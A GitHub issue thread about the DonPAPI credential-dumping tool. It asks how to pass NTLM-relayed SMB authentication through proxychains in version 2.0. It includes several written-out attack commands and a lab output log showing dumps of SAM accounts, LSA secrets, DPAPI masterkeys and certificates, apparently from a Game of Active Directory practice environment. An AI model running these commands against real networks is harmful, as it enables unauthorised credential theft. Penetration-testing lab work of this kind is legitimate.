Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Support for Proxied SMB Authentication Connections #76

Open
mr-pmillz opened this issue Aug 8, 2024 · 2 comments
Open

Support for Proxied SMB Authentication Connections #76

mr-pmillz opened this issue Aug 8, 2024 · 2 comments

Comments

@mr-pmillz
Copy link

Prior to version 2.0, it was possible to proxy smb relayed auth from ntlmrelayx.py to donpapi via the following syntax:

proxychains4 donpapi -o . -dc-ip <DCIP> -no-pass NETBIOSDOMAIN/[email protected]

^ This works properly as intended.

In the latest version since 2.0 release, I haven't been able to figure out how to get this to work. I've tried syntax such as but not limited to:

proxychains4 donpapi collect -d example.com --dc-ip <DCIP> --no-pass -u 'NETBIOSDOMAIN/USERNAME' -t 10.10.10.10
proxychains4 donpapi collect --dc-ip <DCIP> --no-pass -u 'NETBIOSDOMAIN/USERNAME' -t 10.10.10.10
proxychains4 donpapi collect -d NETBIOSDOMAIN --dc-ip <DCIP> --no-pass -u USERNAME -t 10.10.10.10

Is there a way in the latest version of donpapi for the collect sub-command to support proxied authentication?
@vinsroman
Copy link

Hey @mr-pmillz,
I am practicing Game of Active Directory and was able to get it run as
proxychains donpapi collect -t 'TARGETIP' -u 'USERNAME' -d 'NETBIOSDOMAIN' --no-pass
however even as the output shows following

[192.168.56.22] [+] Starting gathering credz
[192.168.56.22] [+] Dumping SAM
[192.168.56.22] [$] [SAM] Got 5 accounts
[192.168.56.22] [+] Dumping LSA
[192.168.56.22] [$] [LSA] (Unknown User):xxxXXXXxxxxXXXXX
[192.168.56.22] [+] Dumping User and Machine masterkeys
[192.168.56.22] [$] [DPAPI] Got 7 masterkeys
[192.168.56.22] [+] Dumping User Chromium Browsers
[192.168.56.22] [+] Dumping User and Machine Certificates
[192.168.56.22] [$] [Certificates] [SYSTEM] - VAGRANT - VAGRANT_3B1B828383EEA854.pfx
[192.168.56.22] [$] [Certificates] [SYSTEM] - SAN not found - SAN not found_B427A2FC1D1C57FC.pfx
[192.168.56.22] [+] Dumping User and Machine Credential Manager
[192.168.56.22] [+] Gathering recent files and desktop files
[192.168.56.22] [+] Dumping User Firefox Browser
[192.168.56.22] [+] Dumping MobaXterm credentials
[192.168.56.22] [+] Dumping MRemoteNg Passwords
[192.168.56.22] [+] Dumping User's RDCManager
[192.168.56.22] [+] Dumping SCCM Credentials

I see only one secret and 2 certs in the donpapi web gui and should get more afaik

@mr-pmillz
Copy link
Author

Ah interesting. Does it work with the DC IP and domain flags? Or does it only work when those flags are not specified when using proxied auth? @vinsroman

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@mr-pmillz @vinsroman